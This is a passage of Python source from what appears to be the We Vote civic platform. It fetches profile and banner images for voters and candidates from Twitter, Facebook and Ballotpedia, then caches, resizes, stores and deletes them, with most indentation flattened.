cache_all_kind_of_images_results['voter_we_vote_id'] = voter.we_vote_id
# DALE 2018-06-19 I don't see why we need a google_civic_election_id for storing a voter's photos
voter_device_link_results = voter_device_link_manager.retrieve_voter_device_link(0, voter_id=voter_id)
if voter_device_link_results['success']:
voter_device_link = voter_device_link_results['voter_device_link']
else:
voter_device_link = VoterDeviceLink()
voter_address_results = voter_address_manager.retrieve_address(0, voter_id)
if voter_address_results['voter_address_found']:
voter_address = voter_address_results['voter_address']
else:
voter_address = VoterAddress()
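        # Use the voter's device link and address already on file to choose a google_civic_election_id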
from ballot.controllers import choose_election_from_existing_data
results = choose_election_from_existing_data(voter_device_link, 0, voter_address)
google_civic_election_id = results['google_civic_election_id']
else:
return cache_all_kind_of_images_results
# DALE NOTE 2017-04-23 I don't think we want to use the twitter_id stored in the voter table
# if positive_value_exists(voter.twitter_id):
# twitter_id = voter.twitter_id
# else:
twitter_user_manager = TwitterUserManager()
twitter_screen_name = ''
twitter_link_to_voter_results = twitter_user_manager.retrieve_twitter_link_to_voter_from_voter_we_vote_id(
voter.we_vote_id, read_only=True)
if twitter_link_to_voter_results['twitter_link_to_voter_found']:
twitter_link_to_voter = twitter_link_to_voter_results['twitter_link_to_voter']
twitter_id = twitter_link_to_voter.twitter_id
twitter_screen_name = twitter_link_to_voter.fetch_twitter_handle_locally_or_remotely()
# DALE NOTE 2017-04-23 I don't think we want to use the facebook_id stored in the voter table
# if positive_value_exists(voter.facebook_id):
# facebook_id = voter.facebook_id
# else:
facebook_manager = FacebookManager()
facebook_link_to_voter_results = facebook_manager.retrieve_facebook_link_to_voter_from_voter_we_vote_id(
voter.we_vote_id)
if facebook_link_to_voter_results['facebook_link_to_voter_found']:
facebook_id = facebook_link_to_voter_results['facebook_link_to_voter'].facebook_user_id
if not positive_value_exists(twitter_id) and not positive_value_exists(facebook_id):
cache_all_kind_of_images_results = {
'voter_id': voter_id,
'voter_we_vote_id': voter.we_vote_id,
'voter_object': voter,
'cached_twitter_profile_image': TWITTER_USER_DOES_NOT_EXIST,
'cached_twitter_background_image': TWITTER_USER_DOES_NOT_EXIST,
'cached_twitter_banner_image': TWITTER_USER_DOES_NOT_EXIST,
'cached_facebook_profile_image': FACEBOOK_USER_DOES_NOT_EXIST,
'cached_facebook_background_image': FACEBOOK_USER_DOES_NOT_EXIST
}
return cache_all_kind_of_images_results
if not positive_value_exists(twitter_id):
        cache_all_kind_of_images_results['cached_twitter_profile_image'] = TWITTER_USER_DOES_NOT_EXIST
        cache_all_kind_of_images_results['cached_twitter_background_image'] = TWITTER_USER_DOES_NOT_EXIST
        cache_all_kind_of_images_results['cached_twitter_banner_image'] = TWITTER_USER_DOES_NOT_EXIST
else:
# Retrieve latest twitter image urls from Twitter
latest_image_urls_results = retrieve_image_urls_from_twitter(twitter_id)
twitter_profile_image_url_https = latest_image_urls_results['latest_twitter_profile_image_url']
twitter_profile_background_image_url_https = latest_image_urls_results['latest_twitter_background_image_url']
twitter_profile_banner_url_https = latest_image_urls_results['latest_twitter_banner_image_url']
# Cache all images if not already cached
if not twitter_profile_image_url_https:
cache_all_kind_of_images_results['cached_twitter_profile_image'] = TWITTER_URL_NOT_FOUND
else:
cache_all_kind_of_images_results['cached_twitter_profile_image'] = cache_image_if_not_cached(
google_civic_election_id, twitter_profile_image_url_https,
voter_we_vote_id=voter.we_vote_id,
twitter_id=twitter_id, twitter_screen_name=twitter_screen_name, is_active_version=True,
kind_of_image_twitter_profile=True, kind_of_image_original=True)
if not twitter_profile_background_image_url_https:
cache_all_kind_of_images_results['cached_twitter_background_image'] = TWITTER_URL_NOT_FOUND
else:
cache_all_kind_of_images_results['cached_twitter_background_image'] = cache_image_if_not_cached(
google_civic_election_id, twitter_profile_background_image_url_https,
voter_we_vote_id=voter.we_vote_id, twitter_id=twitter_id,
twitter_screen_name=twitter_screen_name, is_active_version=True,
kind_of_image_twitter_background=True, kind_of_image_original=True)
if not twitter_profile_banner_url_https:
cache_all_kind_of_images_results['cached_twitter_banner_image'] = TWITTER_URL_NOT_FOUND
else:
cache_all_kind_of_images_results['cached_twitter_banner_image'] = cache_image_if_not_cached(
google_civic_election_id, twitter_profile_banner_url_https,
voter_we_vote_id=voter.we_vote_id, twitter_id=twitter_id,
twitter_screen_name=twitter_screen_name, is_active_version=True,
kind_of_image_twitter_banner=True, kind_of_image_original=True)
if not positive_value_exists(facebook_id):
        cache_all_kind_of_images_results['cached_facebook_profile_image'] = FACEBOOK_USER_DOES_NOT_EXIST
        cache_all_kind_of_images_results['cached_facebook_background_image'] = FACEBOOK_USER_DOES_NOT_EXIST
else:
# Retrieve latest facebook image urls from Facebook
latest_image_urls_results = retrieve_facebook_image_url(facebook_id)
facebook_profile_image_url_https = latest_image_urls_results['facebook_profile_image_url']
facebook_background_image_url_https = latest_image_urls_results['facebook_background_image_url']
# Cache all images if not already cached
if not facebook_profile_image_url_https:
cache_all_kind_of_images_results['cached_facebook_profile_image'] = FACEBOOK_URL_NOT_FOUND
else:
cache_all_kind_of_images_results['cached_facebook_profile_image'] = cache_image_if_not_cached(
google_civic_election_id, facebook_profile_image_url_https,
voter_we_vote_id=voter.we_vote_id,
facebook_user_id=facebook_id, is_active_version=True,
kind_of_image_facebook_profile=True, kind_of_image_original=True)
if not facebook_background_image_url_https:
cache_all_kind_of_images_results['cached_facebook_background_image'] = FACEBOOK_URL_NOT_FOUND
else:
cache_all_kind_of_images_results['cached_facebook_background_image'] = cache_image_if_not_cached(
google_civic_election_id, facebook_background_image_url_https,
voter_we_vote_id=voter.we_vote_id, facebook_user_id=facebook_id,
is_active_version=True, kind_of_image_facebook_background=True, kind_of_image_original=True)
return cache_all_kind_of_images_results
def cache_image_locally(
google_civic_election_id,
image_url_https,
voter_we_vote_id=None,
candidate_we_vote_id=None,
organization_we_vote_id=None,
issue_we_vote_id=None,
twitter_id=None,
twitter_screen_name=None,
facebook_user_id=None,
other_source=None,
maplight_id=None,
vote_smart_id=None,
is_active_version=False,
kind_of_image_twitter_profile=False,
kind_of_image_twitter_background=False,
kind_of_image_twitter_banner=False,
kind_of_image_facebook_profile=False,
kind_of_image_facebook_background=False,
kind_of_image_maplight=False,
kind_of_image_vote_smart=False,
kind_of_image_issue=False,
kind_of_image_ballotpedia_profile=False,
kind_of_image_linkedin_profile=False,
kind_of_image_wikipedia_profile=False,
kind_of_image_other_source=False,
kind_of_image_original=False,
kind_of_image_large=False,
kind_of_image_medium=False,
kind_of_image_tiny=False,
facebook_background_image_offset_x=False,
facebook_background_image_offset_y=False):
"""
Cache one type of image
:param google_civic_election_id:
:param image_url_https:
:param voter_we_vote_id:
:param candidate_we_vote_id:
:param organization_we_vote_id:
:param issue_we_vote_id:
:param twitter_id:
:param twitter_screen_name:
:param facebook_user_id:
:param other_source: # can be MapLight or VoteSmart
:param maplight_id:
:param vote_smart_id:
    :param other_source_profile_image_url: # TODO not currently a parameter; need to find a way to get this
:param is_active_version:
:param kind_of_image_twitter_profile:
:param kind_of_image_twitter_background:
:param kind_of_image_twitter_banner:
:param kind_of_image_facebook_profile:
:param kind_of_image_facebook_background:
:param kind_of_image_maplight:
:param kind_of_image_vote_smart:
:param kind_of_image_issue:
:param kind_of_image_ballotpedia_profile:
:param kind_of_image_linkedin_profile:
:param kind_of_image_wikipedia_profile:
:param kind_of_image_other_source:
:param kind_of_image_original:
:param kind_of_image_large:
:param kind_of_image_medium:
:param kind_of_image_tiny:
:param facebook_background_image_offset_x:
:param facebook_background_image_offset_y:
:return:
"""
we_vote_parent_image_id = None
success = False
status = ''
we_vote_image_created = False
image_url_valid = False
image_stored_from_source = False
image_stored_locally = False
image_stored_to_aws = False
image_versions = []
we_vote_image_manager = WeVoteImageManager()
# create we_vote_image entry with voter_we_vote_id and google_civic_election_id and kind_of_image
create_we_vote_image_results = we_vote_image_manager.create_we_vote_image(
google_civic_election_id=google_civic_election_id,
voter_we_vote_id=voter_we_vote_id,
candidate_we_vote_id=candidate_we_vote_id,
organization_we_vote_id=organization_we_vote_id,
issue_we_vote_id=issue_we_vote_id,
kind_of_image_twitter_profile=kind_of_image_twitter_profile,
kind_of_image_twitter_background=kind_of_image_twitter_background,
kind_of_image_twitter_banner=kind_of_image_twitter_banner,
kind_of_image_facebook_profile=kind_of_image_facebook_profile,
kind_of_image_facebook_background=kind_of_image_facebook_background,
kind_of_image_maplight=kind_of_image_maplight,
kind_of_image_vote_smart=kind_of_image_vote_smart,
kind_of_image_issue=kind_of_image_issue,
kind_of_image_ballotpedia_profile=kind_of_image_ballotpedia_profile,
kind_of_image_linkedin_profile=kind_of_image_linkedin_profile,
kind_of_image_wikipedia_profile=kind_of_image_wikipedia_profile,
kind_of_image_other_source=kind_of_image_other_source,
kind_of_image_original=kind_of_image_original,
kind_of_image_large=kind_of_image_large,
kind_of_image_medium=kind_of_image_medium,
kind_of_image_tiny=kind_of_image_tiny,
facebook_background_image_offset_x=facebook_background_image_offset_x,
facebook_background_image_offset_y=facebook_background_image_offset_y)
status += create_we_vote_image_results['status']
if not create_we_vote_image_results['we_vote_image_saved']:
error_results = {
'success': success,
'status': status,
'we_vote_image_created': we_vote_image_created,
'image_url_valid': image_url_valid,
'image_stored_from_source': image_stored_from_source,
'image_stored_locally': image_stored_locally,
'image_stored_to_aws': image_stored_to_aws,
}
return error_results
we_vote_image_created = True
we_vote_image = create_we_vote_image_results['we_vote_image']
# Image url validation and get source image properties
analyze_source_images_results = analyze_source_images(
twitter_id=twitter_id,
twitter_screen_name=twitter_screen_name,
facebook_user_id=facebook_user_id,
maplight_id=maplight_id,
vote_smart_id=vote_smart_id,
image_url_https=image_url_https,
kind_of_image_twitter_profile=kind_of_image_twitter_profile,
kind_of_image_twitter_background=kind_of_image_twitter_background,
kind_of_image_twitter_banner=kind_of_image_twitter_banner,
kind_of_image_facebook_profile=kind_of_image_facebook_profile,
kind_of_image_facebook_background=kind_of_image_facebook_background,
kind_of_image_maplight=kind_of_image_maplight,
kind_of_image_vote_smart=kind_of_image_vote_smart,
kind_of_image_ballotpedia_profile=kind_of_image_ballotpedia_profile,
kind_of_image_linkedin_profile=kind_of_image_linkedin_profile,
kind_of_image_wikipedia_profile=kind_of_image_wikipedia_profile,
kind_of_image_other_source=kind_of_image_other_source,
other_source=other_source)
if 'analyze_image_url_results' not in analyze_source_images_results or \
'image_url_valid' not in analyze_source_images_results['analyze_image_url_results'] or not \
analyze_source_images_results['analyze_image_url_results']['image_url_valid']:
error_results = {
'success': success,
'status': status + " IMAGE_URL_NOT_VALID",
'we_vote_image_created': True,
'image_url_valid': False,
'image_stored_from_source': image_stored_from_source,
'image_stored_locally': image_stored_locally,
'image_stored_to_aws': image_stored_to_aws,
}
delete_we_vote_image_results = we_vote_image_manager.delete_we_vote_image(we_vote_image)
return error_results
image_url_valid = True
status += " IMAGE_URL_VALID"
# Get today's cached images and their versions so that image version can be calculated
cached_todays_we_vote_image_list_results = we_vote_image_manager.retrieve_todays_cached_we_vote_image_list(
voter_we_vote_id=voter_we_vote_id,
candidate_we_vote_id=candidate_we_vote_id,
organization_we_vote_id=organization_we_vote_id,
issue_we_vote_id=issue_we_vote_id,
kind_of_image_twitter_profile=kind_of_image_twitter_profile,
kind_of_image_twitter_background=kind_of_image_twitter_background,
kind_of_image_twitter_banner=kind_of_image_twitter_banner,
kind_of_image_facebook_profile=kind_of_image_facebook_profile,
kind_of_image_facebook_background=kind_of_image_facebook_background,
kind_of_image_maplight=kind_of_image_maplight,
kind_of_image_vote_smart=kind_of_image_vote_smart,
kind_of_image_issue=kind_of_image_issue,
kind_of_image_ballotpedia_profile=kind_of_image_ballotpedia_profile,
kind_of_image_linkedin_profile=kind_of_image_linkedin_profile,
kind_of_image_wikipedia_profile=kind_of_image_wikipedia_profile,
kind_of_image_other_source=kind_of_image_other_source,
kind_of_image_original=kind_of_image_original)
for cached_we_vote_image in cached_todays_we_vote_image_list_results['we_vote_image_list']:
if cached_we_vote_image.same_day_image_version:
image_versions.append(cached_we_vote_image.same_day_image_version)
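    # Today's image version is one more than the highest version already cached today (or 1 if none)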
if image_versions:
same_day_image_version = max(image_versions) + 1
else:
same_day_image_version = 1
if kind_of_image_facebook_profile or kind_of_image_facebook_background:
# image url is valid so store source image of facebook to WeVoteImage
save_source_info_results = we_vote_image_manager.save_we_vote_image_facebook_info(
we_vote_image, facebook_user_id, analyze_source_images_results['analyze_image_url_results']['image_width'],
analyze_source_images_results['analyze_image_url_results']['image_height'],
image_url_https, same_day_image_version, kind_of_image_facebook_profile,
kind_of_image_facebook_background, image_url_valid)
elif kind_of_image_twitter_profile or kind_of_image_twitter_background or kind_of_image_twitter_banner:
# image url is valid so store source image of twitter to WeVoteImage
save_source_info_results = we_vote_image_manager.save_we_vote_image_twitter_info(
we_vote_image, twitter_id, analyze_source_images_results['analyze_image_url_results']['image_width'],
analyze_source_images_results['analyze_image_url_results']['image_height'],
image_url_https, same_day_image_version, kind_of_image_twitter_profile,
kind_of_image_twitter_background, kind_of_image_twitter_banner, image_url_valid)
elif kind_of_image_maplight:
save_source_info_results = we_vote_image_manager.save_we_vote_image_maplight_info(
we_vote_image, maplight_id, analyze_source_images_results['analyze_image_url_results']['image_width'],
analyze_source_images_results['analyze_image_url_results']['image_height'],
image_url_https, same_day_image_version, kind_of_image_maplight, image_url_valid)
elif kind_of_image_vote_smart:
save_source_info_results = we_vote_image_manager.save_we_vote_image_vote_smart_info(
we_vote_image, vote_smart_id, analyze_source_images_results['analyze_image_url_results']['image_width'],
analyze_source_images_results['analyze_image_url_results']['image_height'],
image_url_https, same_day_image_version, kind_of_image_vote_smart, image_url_valid)
elif kind_of_image_ballotpedia_profile:
save_source_info_results = we_vote_image_manager.save_we_vote_image_ballotpedia_info(
we_vote_image, analyze_source_images_results['analyze_image_url_results']['image_width'],
analyze_source_images_results['analyze_image_url_results']['image_height'],
image_url_https, same_day_image_version, kind_of_image_ballotpedia_profile, image_url_valid)
elif kind_of_image_linkedin_profile:
save_source_info_results = we_vote_image_manager.save_we_vote_image_linkedin_info(
we_vote_image, analyze_source_images_results['analyze_image_url_results']['image_width'],
analyze_source_images_results['analyze_image_url_results']['image_height'],
image_url_https, same_day_image_version, kind_of_image_linkedin_profile, image_url_valid)
elif kind_of_image_wikipedia_profile:
save_source_info_results = we_vote_image_manager.save_we_vote_image_wikipedia_info(
we_vote_image, analyze_source_images_results['analyze_image_url_results']['image_width'],
analyze_source_images_results['analyze_image_url_results']['image_height'],
image_url_https, same_day_image_version, kind_of_image_wikipedia_profile, image_url_valid)
    elif kind_of_image_other_source:
        save_source_info_results = we_vote_image_manager.save_we_vote_image_other_source_info(
            we_vote_image, analyze_source_images_results['analyze_image_url_results']['image_width'],
            analyze_source_images_results['analyze_image_url_results']['image_height'], other_source,
            image_url_https, same_day_image_version, kind_of_image_other_source, image_url_valid)
    else:
        # No handled kind of image was requested, so record a failure rather than leave this undefined
        save_source_info_results = {'success': False, 'status': "KIND_OF_IMAGE_NOT_SAVED_FROM_SOURCE "}
status += " " + save_source_info_results['status']
if save_source_info_results['success']:
image_stored_from_source = True
        date_image_saved = "{year}{month:02d}{day:02d}".format(
            year=we_vote_image.date_image_saved.year,
            month=we_vote_image.date_image_saved.month,
            day=we_vote_image.date_image_saved.day)
        # e.g. twitter_profile_image_master-20170210_1_48x48.png
analyze_image_url_results = analyze_source_images_results['analyze_image_url_results']
image_width = analyze_image_url_results['image_width'] if 'image_width' in analyze_image_url_results else 0
image_height = analyze_image_url_results['image_height'] if 'image_height' in analyze_image_url_results else 0
image_format = analyze_image_url_results['image_format'] if 'image_format' in analyze_image_url_results else ''
we_vote_image_file_name = \
"{image_type}_{master_image}-{date_image_saved}_{counter}_" \
"{image_width}x{image_height}.{image_format}" \
"".format(
image_type=analyze_source_images_results['image_type'],
master_image=MASTER_IMAGE,
date_image_saved=date_image_saved,
counter=str(same_day_image_version),
image_width=str(image_width),
image_height=str(image_height),
image_format=str(image_format))
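        # Store the cached file under the we_vote_id of the voter, candidate or organization it belongs to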
if voter_we_vote_id:
we_vote_image_file_location = voter_we_vote_id + "/" + we_vote_image_file_name
elif candidate_we_vote_id:
we_vote_image_file_location = candidate_we_vote_id + "/" + we_vote_image_file_name
elif organization_we_vote_id:
we_vote_image_file_location = organization_we_vote_id + "/" + we_vote_image_file_name
else:
we_vote_image_file_location = we_vote_image_file_name
image_stored_locally = we_vote_image_manager.store_image_locally(
analyze_source_images_results['image_url_https'], we_vote_image_file_name)
if not image_stored_locally:
error_results = {
'success': success,
'status': status + " IMAGE_NOT_STORED_LOCALLY ",
'we_vote_image_created': we_vote_image_created,
'image_url_valid': image_url_valid,
'image_stored_from_source': image_stored_from_source,
'image_stored_locally': False,
'image_stored_to_aws': image_stored_to_aws,
}
delete_we_vote_image_results = we_vote_image_manager.delete_we_vote_image(we_vote_image)
return error_results
status += " IMAGE_STORED_LOCALLY "
image_stored_to_aws = we_vote_image_manager.store_image_to_aws(
we_vote_image_file_name, we_vote_image_file_location,
analyze_source_images_results['analyze_image_url_results']['image_format'])
if not image_stored_to_aws:
error_results = {
'success': success,
'status': status + " IMAGE_NOT_STORED_TO_AWS ",
'we_vote_image_created': we_vote_image_created,
'image_url_valid': image_url_valid,
'image_stored_from_source': image_stored_from_source,
'image_stored_locally': image_stored_locally,
'image_stored_to_aws': False,
}
delete_we_vote_image_results = we_vote_image_manager.delete_we_vote_image(we_vote_image)
return error_results
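        # Build the public S3 url where the cached image can now be retrieved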
we_vote_image_url = "https://{bucket_name}.s3.amazonaws.com/{we_vote_image_file_location}" \
"".format(bucket_name=AWS_STORAGE_BUCKET_NAME,
we_vote_image_file_location=we_vote_image_file_location)
save_aws_info = we_vote_image_manager.save_we_vote_image_aws_info(we_vote_image, we_vote_image_url,
we_vote_image_file_location,
we_vote_parent_image_id, is_active_version)
status += " IMAGE_STORED_TO_AWS " + save_aws_info['status'] + " "
success = save_aws_info['success']
if not success:
error_results = {
'success': success,
'status': status,
'we_vote_image_created': we_vote_image_created,
'image_url_valid': image_url_valid,
'image_stored_from_source': image_stored_from_source,
'image_stored_locally': image_stored_locally,
'image_stored_to_aws': image_stored_to_aws,
}
delete_we_vote_image_results = we_vote_image_manager.delete_we_vote_image(we_vote_image)
return error_results
else:
error_results = {
'success': success,
'status': status,
'we_vote_image_created': we_vote_image_created,
'image_url_valid': image_url_valid,
'image_stored_from_source': False,
'image_stored_locally': image_stored_locally,
'image_stored_to_aws': image_stored_to_aws,
}
delete_we_vote_image_results = we_vote_image_manager.delete_we_vote_image(we_vote_image)
return error_results
results = {
'success': success,
'status': status,
'we_vote_image_created': we_vote_image_created,
'image_url_valid': image_url_valid,
'image_stored_from_source': image_stored_from_source,
'image_stored_locally': image_stored_locally,
'image_stored_to_aws': image_stored_to_aws,
}
return results
def retrieve_facebook_image_url(facebook_user_id):
"""
    Retrieve the Facebook profile image url from the Graph API and the background image url from the FacebookUser table.
:param facebook_user_id:
:return:
"""
results = {
'facebook_profile_image_url': None,
'facebook_background_image_url': None
}
facebook_manager = FacebookManager()
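    # The Graph API picture endpoint redirects to the image file itself; requests follows the redirect,
    # so response.url below holds the final profile image url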
get_url = "https://graph.facebook.com/v3.1/{facebook_user_id}/picture?width=200&height=200"\
.format(facebook_user_id=facebook_user_id)
response = requests.get(get_url)
if response.status_code == HTTP_OK:
# new facebook profile image url found
results['facebook_profile_image_url'] = response.url
facebook_user_results = facebook_manager.retrieve_facebook_user_by_facebook_user_id(facebook_user_id)
if facebook_user_results['facebook_user_found']:
results['facebook_background_image_url'] = \
facebook_user_results['facebook_user'].facebook_background_image_url_https
return results
def retrieve_and_save_ballotpedia_candidate_images(candidate):
from import_export_ballotpedia.controllers import retrieve_ballotpedia_candidate_image_from_api
status = ""
candidate_manager = CandidateManager()
politician_manager = PoliticianManager()
if not candidate:
status += "BALLOTPEDIA_CANDIDATE_IMAGE_NOT_RETRIEVED-CANDIDATE_MISSING "
results = {
'success': False,
'status': status,
'candidate': None,
}
return results
if positive_value_exists(candidate.ballotpedia_image_id):
status += "BALLOTPEDIA_CANDIDATE_IMAGE-REACHING_OUT_TO_BALLOTPEDIA "
results = retrieve_ballotpedia_candidate_image_from_api(
candidate.ballotpedia_image_id, candidate.google_civic_election_id)
if results['success']:
status += "BALLOTPEDIA_CANDIDATE_IMAGE_RETRIEVED "
# Get original image url for cache original size image
ballotpedia_profile_image_url_https = results['profile_image_url_https']
cache_results = cache_master_and_resized_image(
candidate_id=candidate.id,
candidate_we_vote_id=candidate.we_vote_id,
ballotpedia_profile_image_url=ballotpedia_profile_image_url_https,
image_source=BALLOTPEDIA_IMAGE_SOURCE)
cached_ballotpedia_image_url_https = cache_results['cached_ballotpedia_image_url_https']
we_vote_hosted_profile_image_url_large = cache_results['we_vote_hosted_profile_image_url_large']
we_vote_hosted_profile_image_url_medium = cache_results['we_vote_hosted_profile_image_url_medium']
we_vote_hosted_profile_image_url_tiny = cache_results['we_vote_hosted_profile_image_url_tiny']
save_candidate_results = candidate_manager.update_candidate_ballotpedia_image_details(
candidate,
cached_ballotpedia_image_url_https,
we_vote_hosted_profile_image_url_large,
we_vote_hosted_profile_image_url_medium,
we_vote_hosted_profile_image_url_tiny)
candidate = save_candidate_results['candidate']
            # TODO: Update voter Ballotpedia details for the candidate in the future
save_politician_details_results = politician_manager.update_politician_details_from_candidate(
candidate)
save_position_from_candidate_results = update_all_position_details_from_candidate(candidate)
else:
status += "BALLOTPEDIA_CANDIDATE_IMAGE-CLEARING_DETAILS "
# save_candidate_results = candidate_manager.clear_candidate_twitter_details(
# candidate)
results = {
'success': True,
'status': status,
'candidate': candidate,
}
return results
def retrieve_twitter_image_url(twitter_id, kind_of_image_twitter_profile=False,
kind_of_image_twitter_background=False,
kind_of_image_twitter_banner=False):
"""
Retrieve twitter image urls from TwitterUser table.
:param twitter_id:
:param kind_of_image_twitter_profile:
:param kind_of_image_twitter_background:
:param kind_of_image_twitter_banner:
:return:
"""
twitter_image_url = None
twitter_user_manager = TwitterUserManager()
twitter_user_results = twitter_user_manager.retrieve_twitter_user(twitter_id)
if twitter_user_results['twitter_user_found']:
if kind_of_image_twitter_profile:
twitter_image_url = twitter_user_results['twitter_user'].twitter_profile_image_url_https
elif kind_of_image_twitter_background:
twitter_image_url = twitter_user_results['twitter_user'].twitter_profile_background_image_url_https
elif kind_of_image_twitter_banner:
twitter_image_url = twitter_user_results['twitter_user'].twitter_profile_banner_url_https
return twitter_user_results['twitter_user'], twitter_image_url
def retrieve_image_urls_from_twitter(twitter_id):
"""
    Retrieve the latest twitter profile, background and banner image urls via a Twitter API call
:param twitter_id:
:return:
"""
latest_twitter_profile_image_url = None
latest_twitter_background_image_url = None
latest_twitter_banner_image_url = None
twitter_user_info_results = retrieve_twitter_user_info(twitter_id, twitter_handle='')
if 'profile_image_url_https' in twitter_user_info_results['twitter_json'] \
and twitter_user_info_results['twitter_json']['profile_image_url_https']:
# new twitter image url found
latest_twitter_profile_image_url = twitter_user_info_results['twitter_json'][
'profile_image_url_https']
if 'profile_background_image_url_https' in twitter_user_info_results['twitter_json'] \
and twitter_user_info_results['twitter_json']['profile_background_image_url_https']:
# new twitter image url found
latest_twitter_background_image_url = twitter_user_info_results['twitter_json'][
'profile_background_image_url_https']
if 'profile_banner_url' in twitter_user_info_results['twitter_json'] \
and twitter_user_info_results['twitter_json']['profile_banner_url']:
# new twitter image url found
latest_twitter_banner_image_url = twitter_user_info_results['twitter_json'][
'profile_banner_url']
results = {
'latest_twitter_profile_image_url': latest_twitter_profile_image_url,
'latest_twitter_background_image_url': latest_twitter_background_image_url,
'latest_twitter_banner_image_url': latest_twitter_banner_image_url,
}
return results
def analyze_source_images(
twitter_id=0,
twitter_screen_name='',
facebook_user_id=0,
maplight_id=0,
vote_smart_id=0,
image_url_https="",
kind_of_image_twitter_profile=False,
kind_of_image_twitter_background=False,
kind_of_image_twitter_banner=False,
kind_of_image_facebook_profile=False,
kind_of_image_facebook_background=False,
kind_of_image_maplight=False,
kind_of_image_vote_smart=False,
kind_of_image_ballotpedia_profile=False,
kind_of_image_campaignx_photo=False,
kind_of_image_linkedin_profile=False,
kind_of_image_wikipedia_profile=False,
kind_of_image_other_source=False,
other_source=False):
"""
:param twitter_id:
:param twitter_screen_name:
:param facebook_user_id:
:param maplight_id:
:param vote_smart_id:
:param image_url_https:
:param kind_of_image_twitter_profile:
:param kind_of_image_twitter_background:
:param kind_of_image_twitter_banner:
:param kind_of_image_facebook_profile:
:param kind_of_image_facebook_background:
:param kind_of_image_maplight:
:param kind_of_image_vote_smart:
:param kind_of_image_ballotpedia_profile:
:param kind_of_image_campaignx_photo:
:param kind_of_image_linkedin_profile:
:param kind_of_image_wikipedia_profile:
:param kind_of_image_other_source:
:param other_source:
:return:
"""
image_type = None
if kind_of_image_twitter_profile:
image_type = TWITTER_PROFILE_IMAGE_NAME
elif kind_of_image_twitter_background:
image_type = TWITTER_BACKGROUND_IMAGE_NAME
elif kind_of_image_twitter_banner:
image_type = TWITTER_BANNER_IMAGE_NAME
elif kind_of_image_facebook_profile:
image_type = FACEBOOK_PROFILE_IMAGE_NAME
elif kind_of_image_facebook_background:
image_type = FACEBOOK_BACKGROUND_IMAGE_NAME
elif kind_of_image_maplight:
image_type = MAPLIGHT_IMAGE_NAME
elif kind_of_image_vote_smart:
image_type = VOTE_SMART_IMAGE_NAME
elif kind_of_image_ballotpedia_profile:
image_type = BALLOTPEDIA_IMAGE_NAME
elif kind_of_image_campaignx_photo:
image_type = CAMPAIGNX_PHOTO_IMAGE_NAME
elif kind_of_image_linkedin_profile:
image_type = LINKEDIN_IMAGE_NAME
elif kind_of_image_wikipedia_profile:
image_type = WIKIPEDIA_IMAGE_NAME
elif kind_of_image_other_source:
image_type = other_source
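    # Check the remote image url and read its width, height and format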
analyze_image_url_results = analyze_remote_url(image_url_https)
results = {
'twitter_id': twitter_id,
'twitter_screen_name': twitter_screen_name,
'facebook_user_id': facebook_user_id,
'maplight_id': maplight_id,
'vote_smart_id': vote_smart_id,
'image_url_https': image_url_https,
'image_type': image_type,
'analyze_image_url_results': analyze_image_url_results
}
return results
def create_resized_images_for_all_organizations():
"""
Create resized images for all organizations
:return:
"""
create_all_resized_images_results = []
we_vote_image_list = WeVoteImage.objects.all()
# TODO Limit this to organizations only
for we_vote_image in we_vote_image_list:
# Iterate through all cached images
create_resized_images_results = create_resized_image_if_not_created(we_vote_image)
create_all_resized_images_results.append(create_resized_images_results)
return create_all_resized_images_results
def create_resized_images_for_all_voters():
"""
Create resized images for all voters
:return:
"""
create_all_resized_images_results = []
we_vote_image_list = WeVoteImage.objects.all()
# TODO Limit this to voters only
for we_vote_image in we_vote_image_list:
# Iterate through all cached images
create_resized_images_results = create_resized_image_if_not_created(we_vote_image)
create_all_resized_images_results.append(create_resized_images_results)
return create_all_resized_images_results
def delete_cached_images_for_candidate(candidate):
original_twitter_profile_image_url_https = None
original_twitter_profile_background_image_url_https = None
original_twitter_profile_banner_url_https = None
    delete_image_count = 0
    not_deleted_image_count = 0
    success = False
    status = "NO_IMAGE_FOUND_FOR_CANDIDATE"
we_vote_image_list = retrieve_all_images_for_one_candidate(candidate.we_vote_id)
if len(we_vote_image_list) > 0:
we_vote_image_manager = WeVoteImageManager()
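        # Capture the active original source image urls so the candidate, Twitter, position and politician records
        # can be reset to them after the cached copies are deleted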
for we_vote_image in we_vote_image_list:
if we_vote_image.kind_of_image_twitter_profile and we_vote_image.kind_of_image_original and \
we_vote_image.is_active_version:
original_twitter_profile_image_url_https = we_vote_image.twitter_profile_image_url_https
if we_vote_image.kind_of_image_twitter_background and we_vote_image.kind_of_image_original and \
we_vote_image.is_active_version:
original_twitter_profile_background_image_url_https = \
we_vote_image.twitter_profile_background_image_url_https
if we_vote_image.kind_of_image_twitter_banner and we_vote_image.kind_of_image_original and \
we_vote_image.is_active_version:
original_twitter_profile_banner_url_https = we_vote_image.twitter_profile_banner_url_https
# Reset CandidateCampaign with original image details
candidate_manager = CandidateManager()
reset_candidate_image_results = candidate_manager.reset_candidate_image_details(
candidate, original_twitter_profile_image_url_https, original_twitter_profile_background_image_url_https,
original_twitter_profile_banner_url_https)
# Reset Twitter User Table with original image details
twitter_user_manager = TwitterUserManager()
reset_twitter_user_image_results = twitter_user_manager.reset_twitter_user_image_details(
candidate.twitter_user_id, original_twitter_profile_image_url_https,
original_twitter_profile_background_image_url_https, original_twitter_profile_banner_url_https)
# Reset Position Table with original image details
reset_position_image_results = reset_all_position_image_details_from_candidate(
candidate, original_twitter_profile_image_url_https)
# Reset Politician Table with original image details
politician_manager = PoliticianManager()
reset_politician_image_results = politician_manager.reset_politician_image_details_from_candidate(
candidate, original_twitter_profile_image_url_https, original_twitter_profile_background_image_url_https,
original_twitter_profile_banner_url_https)
if reset_candidate_image_results['success']:
for we_vote_image in we_vote_image_list:
# Delete image from AWS
image_deleted_from_aws = we_vote_image_manager.delete_image_from_aws(
we_vote_image.we_vote_image_file_location)
delete_result = we_vote_image_manager.delete_we_vote_image(we_vote_image)
if delete_result['success']:
delete_image_count += 1
else:
not_deleted_image_count += 1
success = True
status = "DELETED_CACHED_IMAGES_FOR_CANDIDATE"
else:
success = False
status = "NO_IMAGE_FOUND_FOR_CANDIDATE"
results = {
'success': success,
'status': status,
'delete_image_count': delete_image_count,
'not_deleted_image_count': not_deleted_image_count,
}
return results
def delete_cached_images_for_issue(issue):
    delete_image_count = 0
    not_deleted_image_count = 0
    success = False
    status = "NO_IMAGE_FOUND_FOR_ISSUE"
we_vote_image_list = retrieve_all_images_for_one_issue(issue.we_vote_id)
if len(we_vote_image_list) > 0:
we_vote_image_manager = WeVoteImageManager()
# Reset Issue with original image details
issue_manager = IssueManager()
